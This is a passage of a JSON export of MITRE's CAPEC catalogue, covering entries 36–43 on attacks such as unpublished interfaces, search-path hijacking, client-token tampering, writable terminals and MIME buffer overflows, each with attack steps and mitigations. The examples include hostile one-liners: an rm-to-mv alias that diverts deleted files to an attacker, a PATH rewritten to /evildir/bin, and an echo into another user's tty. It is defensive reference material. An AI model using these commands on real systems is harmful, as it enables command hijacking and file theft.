Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Examples-Instances, Related_Attack_Patterns, Type (Attack_Pattern -> Relationship)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"36":{"ID":"36","Name":"Using Unpublished Interfaces","Abstraction":"Standard","Status":"Draft","Description":"An adversary searches for and invokes interfaces that the target system designers did not intend to be publicly available. If these interfaces fail to authenticate requests the attacker may be able to invoke functionality they are not authorized for.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify services] Discover a service of interest by exploring service registry listings or by connecting on a known port or some similar means.","Technique":["Search via internet for known, published services.","Use automated tools to scan known ports to identify internet-enabled services.","Dump the code from the chip and then perform reverse engineering to analyze the code."]},{"Step":"2","Phase":"Explore","Description":"[Authenticate to service] Authenticate to the service, if required, in order to explore it.","Technique":["Use published credentials to access system.","Find unpublished credentails to access service.","Use other attack pattern or weakness to bypass authentication."]},{"Step":"3","Phase":"Explore","Description":"[Identify all interfaces] Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.","Technique":["For any published services, determine exposed interfaces via the documentation provided.","For any services found, use error messages from poorly formed service calls to determine valid interfaces. In some cases, services will respond to poorly formed calls with valid ones."]},{"Step":"4","Phase":"Experiment","Description":"[Attempt to discover unpublished functions] Using manual or automated means, discover unpublished or undocumented functions exposed by the service.","Technique":["Manually attempt calls to the service using an educated guess approach, including the use of terms like\' \'test\', \'debug\', \'delete\', etc.","Use automated tools to scan the service to attempt to reverse engineer exposed, but undocumented, features."]},{"Step":"5","Phase":"Exploit","Description":"[Exploit unpublished functions] Using information determined via experimentation, exploit the unpublished features of the service.","Technique":["Execute features that are not intended to be used by general system users.","Craft malicious calls to features not intended to be used by general system users that take advantage of security flaws found in the functions."]}]},"Prerequisites":{"Prerequisite":"The architecture under attack must publish or otherwise make available services that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be \'discoverable\', but in the event it isn\'t it must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service."},"Skills_Required":{"Skill":["A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that they can sniff/monitor for.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. Web service digging tools may be helpful."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":"Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like."},"Example_Instances":{"Example":"To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one\'s own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google\'s business model. Most organizations, however, do not have the same business model. Organizations publishing services usually fall back on thoughts that Attackers \\"will not know services exist\\" and that \\"even if they did, they wouldn\'t be able to access them because they\'re not on the local LAN.\\" Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"306"},{"CWE_ID":"693"},{"CWE_ID":"695"},{"CWE_ID":"1242"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Description, Execution_Flow, Related_Attack_Patterns, Related_Weaknesses, Skills_Required"}],"Previous_Entry_Name":["Using Unpublished Web Service APIs",{"Date":"2015-12-07"},"Using Unpublished APIs",{"Date":"2020-07-30"}]}},"37":{"ID":"37","Name":"Retrieve Embedded Sensitive Data","Abstraction":"Detailed","Status":"Draft","Description":"An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"167"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify Target] Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.","Technique":["Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.","Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack."]},{"Step":"2","Phase":"Experiment","Description":"[Apply mining techniques] The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to extract the information of interest.","Technique":["API Profiling. The attacker monitors the software\'s use of registry keys or other operating system-provided storage locations that can contain sensitive information.","Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.","Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.","Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format."]}]},"Prerequisites":{"Prerequisite":["In order to feasibly execute this type of attack, some valuable data must be present in client software.","Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack."]},"Skills_Required":{"Skill":["The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as \\"Strings\\" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Example_Instances":{"Example":["Using a tool such as \'strings\' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user\'s purview should be.","An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.","Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"226"},{"CWE_ID":"311"},{"CWE_ID":"525"},{"CWE_ID":"312"},{"CWE_ID":"314"},{"CWE_ID":"315"},{"CWE_ID":"318"},{"CWE_ID":"1239"},{"CWE_ID":"1258"},{"CWE_ID":"1266"},{"CWE_ID":"1272"},{"CWE_ID":"1278"},{"CWE_ID":"1301"},{"CWE_ID":"1330"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.004","Entry_Name":"Unsecured Credentials:Private Keys"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Lifting Data Embedded in Client Distributions",{"Date":"2015-11-09"}]}},"38":{"ID":"38","Name":"Leveraging/Manipulating Configuration File Search Paths","Abstraction":"Detailed","Status":"Draft","Description":"This pattern of attack sees an adversary load a malicious resource into a program\'s standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Prerequisites":{"Prerequisite":"The attacker must be able to write to redirect search paths on the victim host."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Ensure that the program\'s compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program","Implementation: Host integrity monitoring"]},"Example_Instances":{"Example":[{"p":["Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \\"rm\\" could be aliased to \\"mv\\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting","In this case the attacker retains a copy of all the files the victim attempts to remove."],"div":["alias rm=mv /usr/home/attacker",{"style":"margin-left:10px;","class":"informative"}]},{"p":["A standard UNIX path looks similar to this","If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers\' behalf:","This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution."],"div":["/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin",{"style":"margin-left:10px;","class":"informative"},"/evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"426"},{"CWE_ID":"427"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.007","Entry_Name":"Hijack Execution Flow:Path Interception by PATH Environment Variable"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Examples-Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"39":{"ID":"39","Name":"Manipulating Opaque Client-based Data Tokens","Abstraction":"Standard","Status":"Draft","Description":"In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Enumerate information passed to client side] The attacker identifies the parameters used as part of tokens to take business or security decisions","Technique":["Use WebScarab to reveal hidden fields while browsing.","Use a sniffer to capture packets","View source of web page to find hidden fields","Examine URL to see if any opaque tokens are in it","Disassemble or decompile client-side application","Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc."]},{"Step":"2","Phase":"Explore","Description":"[Determine protection mechanism for opaque token] The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.","Technique":["Look for signs of well-known character encodings","Look for cryptographic signatures","Look for delimiters or other indicators of structure"]},{"Step":"3","Phase":"Experiment","Description":"[Modify parameter/token values] Trying each parameter in turn, the attacker modifies the values","Technique":["Modify tokens logically","Modify tokens arithmetically","Modify tokens bitwise","Modify structural components of tokens","Modify order of parameters/tokens"]},{"Step":"4","Phase":"Experiment","Description":"[Cycle through values for each parameter.] Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server","Technique":["Use network-level packet injection tools such as netcat","Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.","Use modified client (modified by reverse engineering)","Use debugging tools to modify data in client"]}]},"Prerequisites":{"Prerequisite":["An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.","For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere."]},"Skills_Required":{"Skill":["If the client site token is obfuscated.",{"Level":"Medium"},"If the client site token is encrypted.",{"Level":"High"}]},"Resources_Required":{"Resource":"The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \\"message authentication code\\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a \\"malicious\\" value, all the protective cryptography in the world can\'t make the value \'correct\' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn\'t help.","Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)","Make sure that all session tokens use a good source of randomness","Perform validation on the server side to make sure that client side data tokens are consistent with what is expected."]},"Example_Instances":{"Example":["With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.","Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \\"u\\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \\"u\\" for \\"a\\" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct \\"flip\\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.","Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"353"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"472"},{"CWE_ID":"565"},{"CWE_ID":"315"},{"CWE_ID":"539"},{"CWE_ID":"384"},{"CWE_ID":"233"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"40":{"ID":"40","Name":"Manipulating Writeable Terminal Devices","Abstraction":"Standard","Status":"Draft","Description":"This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify attacker-writable terminals] Determine if users TTYs are writable by the attacker.","Technique":["Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.","Attempt to write to other user TTYs. This approach could leave a trail or alert a user."]},{"Step":"2","Phase":"Exploit","Description":"[Execute malicious commands] Using one or more vulnerable TTY, execute commands to achieve various impacts.","Technique":"Commands that allow reading or writing end user files can be executed."}]},"Prerequisites":{"Prerequisite":"User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user\'s terminals."},"Skills_Required":{"Skill":["Ability to discover permissions on terminal devices. Of course, brute force can also be used.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Access to a terminal on the target network"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Ensure that terminals are only writeable by named owner user and/or administrator","Design: Enforce principle of least privilege"]},"Example_Instances":{"Example":{"p":["\\"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.","where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim\'s tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\\" [REF-1]","If the victim continues to hit \\"enter\\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on."],"div":["\\"$echo -e \\"\\\\033[30m\\\\033\\\\132\\" > /dev/ttyXX",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"77"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description, Description Summary, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Related_Attack_Patterns, Type (Attack_Pattern -> Relationship)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}]}},"41":{"ID":"41","Name":"Using Meta-characters in E-mail Headers to Inject Malicious Payloads","Abstraction":"Detailed","Status":"Draft","Description":"This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user\'s system.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"ChildOf","CAPEC_ID":"134"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Identify and characterize metacharacter-processing vulnerabilities in email headers] An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.","Technique":["Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.","Manually tampering email headers to inject malicious metacharacter-based payload content in them."]},{"Step":"2","Phase":"Exploit","Description":"An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.","Technique":"Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase."}]},"Prerequisites":{"Prerequisite":"This attack targets most widely deployed feature rich email applications, including web based email programs."},"Skills_Required":{"Skill":["To distribute email",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":["Design: Perform validation on email header data","Implementation: Implement email filtering solutions on mail server or on MTA, relay server.","Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names"]},"Example_Instances":{"Example":[{"div":["To:<someone@example.com>",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.","Meta-characters like \\\\w \\\\s \\\\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user\'s process."]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"150"},{"CWE_ID":"88"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}}},"42":{"ID":"42","Name":"MIME Conversion","Abstraction":"Detailed","Status":"Draft","Description":"An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target mail server] The adversary identifies a target mail server that they wish to attack.","Technique":"Use Nmap on a system to identify a mail server service."},{"Step":"2","Phase":"Explore","Description":"[Determine viability of attack] Determine whether the mail server is unpatched and is potentially vulnerable to one of the known MIME conversion buffer overflows (e.g. Sendmail 8.8.3 and 8.8.4)."},{"Step":"3","Phase":"Experiment","Description":"[Find injection vector] Identify places in the system where vulnerable MIME conversion routines may be used."},{"Step":"4","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts e-mail messages with special headers that will cause a buffer overflow for the vulnerable MIME conversion routine. The intent of this attack is to leverage the overflow for execution of arbitrary code and gain access to the mail server machine, so the adversary will craft an email that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversary\'s choosing.","Technique":["Create malicious shellcode that will execute when the program execution is returned to it.","Use a NOP-sled in the overflow content to more easily \\"slide\\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs"]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Send e-mail messages to the target system with specially crafted headers that trigger the buffer overflow and execute the shell code."}]},"Prerequisites":{"Prerequisite":["The target system uses a mail server.","Mail server vendor has not released a patch for the MIME conversion routine, the patch itself has a security hole or does not fix the original problem, or the patch has not been applied to the user\'s system."]},"Skills_Required":{"Skill":["It may be trivial to cause a DoS via this attack pattern",{"Level":"Low"},"Causing arbitrary code to execute on the target system.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Stay up to date with third party vendor patches",{"p":["Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.","For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):","This can be achieved for the \\"Mlocal\\" and \\"Mprog\\" Mailers by modifying the \\".mc\\" file to include the following lines:","and then rebuilding the sendmail.cf file using m4(1).","From \\"Exploiting Software\\", please see reference below."],"div":["Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,",{"style":"margin-left:10px;","class":"informative","div":["T=DNS/RFC822/X-Unix,",{"style":"margin-left:10px;"},"D=$z:/,",{"style":"margin-left:10px;"}]},"define(`LOCAL_MAILER_FLAGS\',",{"style":"margin-left:10px;","class":"informative","div":["ifdef(`LOCAL_MAILER_FLAGS\',",{"style":"margin-left:10px;","div":["`translit(LOCAL_MAILER_FLAGS, `9\')\',",{"style":"margin-left:10px;"}]},"ifdef(`LOCAL_SHELL_FLAGS\',",{"style":"margin-left:10px;","div":["`translit(LOCAL_SHELL_FLAGS, `9\')\',",{"style":"margin-left:10px;"}]}]}]},"Use the sendmail restricted shell program (smrsh)","Use mail.local"]},"Example_Instances":{"Example":{"div":["Attack Example: Sendmail Overflow",{"style":"color:#32498D; font-weight:bold;"}],"p":["A MIME conversion buffer overflow exists in Sendmail versions 8.8.3 and 8.8.4. Sendmail versions 8.8.3 and 8.8.4 are vulnerable to a buffer overflow in the MIME handling code. By sending a message with specially-crafted headers to the server, a remote attacker can overflow a buffer and execute arbitrary commands on the system with root privileges.","Sendmail performs a 7 bit to 8 bit conversion on email messages. This vulnerability is due to the fact that insufficient bounds checking was performed while performing these conversions. This gave attacker an opportunity to overwrite the internal stack of sendmail while it is executing with root privileges. An attacker first probes the target system to figure out what mail server is used on the system and what version. An attacker could then test out the exploit at their leisure on their own machine running the same version of the mail server before using it in the wild."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"74"},{"CWE_ID":"20"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-364"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"43":{"ID":"43","Name":"Exploiting Multiple Input Interpretation Layers","Abstraction":"Detailed","Status":"Draft","Description":"An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \\"layer\\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --\x3e <input validator> --\x3e <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application/system inputs where bypassing input validation is desired] The attacker first needs to determine all of the application\'s/system\'s inputs where input validation is 